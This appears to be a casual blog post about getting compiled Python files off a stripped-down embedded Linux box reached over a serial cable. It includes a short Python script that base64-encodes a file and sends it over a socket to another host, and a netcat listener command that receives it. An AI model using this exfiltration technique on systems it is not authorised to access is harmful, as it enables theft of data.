Exfiltration from a stripped down system.

No Comments

From the "in case I need to do this again" archives

So recently I got access to an embedded linux system via soldered on serial cable, and on this system there were a bunch of compiled python bytecode files that I really wanted to look and while it had network access there were a couple of hurdles to get over.

  • It was running a really old version of busybox that was lacking all of the tools that would make this easy. (no netcat, no scp, no ftp client, no tftp client)
  • Very limited space, so statically compiling binaries and attempting to copy them across was going to be touch and go.
  • Nothing on the device would let me do any analysis without first moving the files of the box.

After digging around the only thing I found was python and a handful of libraries, so I knew we were good :)

Given I have no idea if any of these files have nulls in them, the best bet was to base64 those bad boys then spit them out onto the wire, this means I don't have to worry about truncating any transfers or filling up the couple of meg I have on the storage.

Boom, quick and dirty python 5 liner.

import sys, base64, socket

input = open(sys.argv[1]).read()

s = socket.socket()
s.connect( ("192.168.0.99", 1900) )
s.send (base64.b64encode(input))


Set up your netcat listener on the address specified.

nc -l 1900 | base64 -d > somefile


and call your script.

Robert's a good friend of your aunt.

Yes, yes as with all my code this can be improved upon, but I think you're missing the point: Backed into the corner, quick and dirty.*

I was lucky this time that python was installed, going to look at other ways to exfil data with naff all tools. If you have any suggestion drop me a line.




* Coincidentally this just how your mum likes it.**

** Sorry***

*** Possibly a lie